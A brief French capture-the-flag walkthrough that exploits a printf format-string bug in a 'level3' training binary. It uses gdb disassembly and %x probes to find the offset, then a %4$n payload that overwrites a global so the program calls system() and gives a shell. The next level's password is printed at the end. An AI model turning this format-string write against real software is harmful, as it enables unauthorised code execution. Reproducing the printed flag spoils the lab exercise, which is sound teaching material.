gdb level3
disass v

	   0x080484da <+54>:	mov    0x804988c,%eax
	   0x080484df <+59>:	cmp    $0x40,%eax
	........	
	   0x08048513 <+111>:	call   0x80483c0 <system@plt>

Nous avons donc une comparaiso entre 0x804988c et 0x40 (64 en decimal)

Maintenant nous essayons de trouver l'offset

./level3
AAAA %x %x %x %x %x
AAAA 200 b7fd1ac0 b7ff37d0 41414141 20782520

L'offset est donc de 4

On utilise %n de printf pour ecrire sur l'addresse que nous voulons (0x804988c)

'%4$n' va donc nous permettre d'ecrire sur l'addresse en debut de string ainsi que d'ecrire les characteres present avant.

``printf(0x804988c, VALEUR %4$n)``

prepare:

python -c "print '\x8c\x98\x04\x08' + 'A' * 60 + '%4\$n'" > /tmp/level3

cat /tmp/level3 - | ./level3

cd ../level4 && cat .pass

b209ea91ad69ef36f2cf0fcbbc24c739fd10464cf545b20bea8572ebdc3c36fa

